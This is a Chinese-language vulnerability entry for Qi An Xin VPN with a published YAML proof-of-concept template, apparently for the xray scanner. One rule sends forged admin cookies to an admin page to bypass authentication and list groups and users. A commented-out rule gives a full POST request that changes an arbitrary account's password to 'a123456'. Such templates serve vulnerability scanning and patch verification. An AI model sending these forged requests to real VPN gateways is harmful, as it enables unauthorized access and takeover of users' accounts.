漏洞描述
奇安信VPN未授权管理用户遍历及任意账号密码修改
qianxin-userlist-motify-user-password: 奇安信 VPN 未授权管理用户遍历及任意账号密码修改
PoC代码[已公开]
id: qianxin-userlist-motify-user-password
info:
name: 奇安信 VPN 未授权管理用户遍历及任意账号密码修改
author: Zhiliao
severity: critical
verified: true
description: |
奇安信VPN未授权管理用户遍历及任意账号密码修改
reference:
- https://cn-sec.com/archives/1785824.html
created: 2023/06/07
set:
baseurl: request.url
rules:
r0:
request:
method: GET
path: /admin/group/x_group.php?id=1
headers:
Cookie: admin_id=1; gw_admin_ticket=1;
expression: |
response.status == 200 &&
response.body.bcontains(b'group_action.php') &&
response.body.bcontains(b'anonymous')
# r1:
# request:
# method: POST
# path: /changepass.php?type=2
# headers:
# Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"anonymous","subAuthId":"1"}
# Origin: "{{baseurl}}"
# Referer: "{{baseurl}}/welcome.php"
# body: old_pass=&password=a123456&repassword=a123456
expression: r0()